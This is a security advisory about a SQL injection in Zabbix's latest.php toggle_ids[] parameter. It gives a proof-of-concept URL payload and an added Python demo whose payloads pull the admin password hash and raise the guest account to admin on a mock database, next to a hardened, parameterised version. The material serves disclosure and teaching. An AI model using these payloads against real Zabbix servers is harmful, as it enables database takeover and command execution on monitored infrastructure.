Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability.

==========================================
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.
Homepage: http://www.zabbix.com
Patch link: https://support.zabbix.com/browse/ZBX-11023
Credit: 1N3@CrowdShield
==========================================

Vendor Description:
=====================
Zabbix is an open source availability and performance monitoring solution.

Vulnerability Overview:
=====================
Zabbix 2.2.x, 3.0.x and trunk suffer from a remote SQL injection vulnerability: the values of the toggle_ids[] array parameter of the latest.php page are not sanitized before they are placed in an SQL query.

Business Impact:
=====================
By exploiting this SQL injection vulnerability, an authenticated attacker (or a guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system. Because of the functionality Zabbix offers, an attacker with admin privileges can (depending on the configuration) execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure. Although the attacker generally needs to be authenticated, the system can also be at risk if the adversary has no user account: Zabbix offers a guest mode which provides a low-privileged default account that requires no password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.

Proof of Concept:
=====================
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=&toggle_ids[]=); select * from users where (=

Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (, , 'web.latest.toggle', '', , ); select * from users where (=)
latest.php -> require_once() -> CProfile::flush() -> CProfile::insertDB() -> DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:

Disclosure Timeline:
=====================
// - Reported vulnerability to Zabbix
// - Zabbix responded with permission to file CVE and to disclose after a patch is made public
// - Zabbix released patch for vulnerability
// - CVE details submitted
// - Vulnerability details disclosed

Source: https://packetstormsecurity.com/files/138312
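
To make the injection point concrete, here is an added example written for this page; it is not Zabbix's code and not the fix shipped under ZBX-11023. It models, in Python with an in-memory SQLite database standing in for Zabbix's MySQL/PostgreSQL backend, the query shape visible in the Result line above: the request-supplied toggle id is concatenated into the numeric idx2 position of the INSERT with no quoting and no validation. The table layouts, sample rows (the Admin hash is the MD5 of the default password "zabbix", the guest hash the MD5 of an empty string), the constant profile values and the two payloads are all constructed for the example. It goes one step beyond the advisory's stacked-statement PoC by showing that a scalar subquery in the same position makes the single INSERT store an arbitrary value from another table, so the bug is exploitable even where the driver refuses stacked statements; the hardened function rejects anything that is not an unsigned integer and binds the value as a parameter.

```python
import re
import sqlite3

# Constructed stand-in schema for the users and profiles tables named in the
# advisory's Result line. SQLite in memory replaces Zabbix's database backend;
# the column types are simplified and are not Zabbix's real DDL.
SCHEMA = """
CREATE TABLE users (userid INTEGER PRIMARY KEY, alias TEXT, passwd TEXT, type INTEGER);
CREATE TABLE profiles (profileid INTEGER PRIMARY KEY, userid INTEGER, idx TEXT,
                       value_int INTEGER, type INTEGER, idx2 INTEGER);
INSERT INTO users VALUES (1, 'Admin', '5fce1b3e34b520afeffb37ce08c7cd66', 3);
INSERT INTO users VALUES (2, 'guest', 'd41d8cd98f00b204e9800998ecf8427e', 1);
"""

# Constructed values for the columns the frontend fills in itself.
USERID, IDX, VALUE_INT, PTYPE = 1, "web.latest.toggle", 1, 2


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_insert_sql(toggle_id):
    """Build the INSERT the way the advisory's Result line shows it: the
    toggle id from the request is concatenated into the numeric idx2
    position, unquoted and unvalidated, so whatever the client sends is SQL."""
    return ("INSERT INTO profiles (userid, idx, value_int, type, idx2) VALUES "
            f"({USERID}, '{IDX}', '{VALUE_INT}', {PTYPE}, {toggle_id})")


def vulnerable_toggle(db, toggle_ids):
    """Model of the unpatched behaviour. executescript() stands in for a
    database driver that accepts stacked statements, as in the advisory's PoC."""
    for toggle_id in toggle_ids:
        db.executescript(vulnerable_insert_sql(toggle_id))


def hardened_toggle(db, toggle_ids):
    """Hardened version (added here, not Zabbix's patch): reject anything that
    is not an unsigned decimal integer, then bind the value as a parameter."""
    for toggle_id in toggle_ids:
        if not isinstance(toggle_id, str) or not re.fullmatch(r"[0-9]{1,20}", toggle_id):
            raise ValueError(f"invalid toggle id: {toggle_id!r}")
    db.executemany(
        "INSERT INTO profiles (userid, idx, value_int, type, idx2) VALUES (?, ?, ?, ?, ?)",
        [(USERID, IDX, VALUE_INT, PTYPE, int(t)) for t in toggle_ids])
    db.commit()


def profile_idx2_values(db):
    """Return what was stored in profiles.idx2, in insertion order."""
    return [row[0] for row in db.execute("SELECT idx2 FROM profiles ORDER BY profileid")]


def user_type(db, alias):
    return db.execute("SELECT type FROM users WHERE alias = ?", (alias,)).fetchone()[0]


# Two constructed payloads sent in the position of toggle_ids[]:
# 1. a scalar subquery: the INSERT itself stores the Admin password hash into
#    profiles.idx2, so no stacked statement is needed;
# 2. a stacked statement in the style of the advisory's PoC.
SUBQUERY_PAYLOAD = "(SELECT passwd FROM users WHERE userid = 1)"
STACKED_PAYLOAD = "0); UPDATE users SET type = 3 WHERE alias = 'guest'; --"


if __name__ == "__main__":
    db = fresh_db()
    vulnerable_toggle(db, [SUBQUERY_PAYLOAD])
    print("idx2 after subquery payload:", profile_idx2_values(db))
    vulnerable_toggle(db, [STACKED_PAYLOAD])
    print("guest user type after stacked payload:", user_type(db, "guest"))

    db = fresh_db()
    for payload in (SUBQUERY_PAYLOAD, STACKED_PAYLOAD):
        try:
            hardened_toggle(db, [payload])
        except ValueError as exc:
            print("hardened version rejected:", exc)
    hardened_toggle(db, ["12345"])
    print("idx2 after hardened insert:", profile_idx2_values(db))
```

The subquery case is the one to remember when assessing impact: a numeric column that is written without quoting needs no stacked-statement support and no output channel other than the profiles table the frontend itself reads back. The fix is validation of the array elements as integers before query construction, not escaping, because escaping does nothing for a value that is never quoted.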
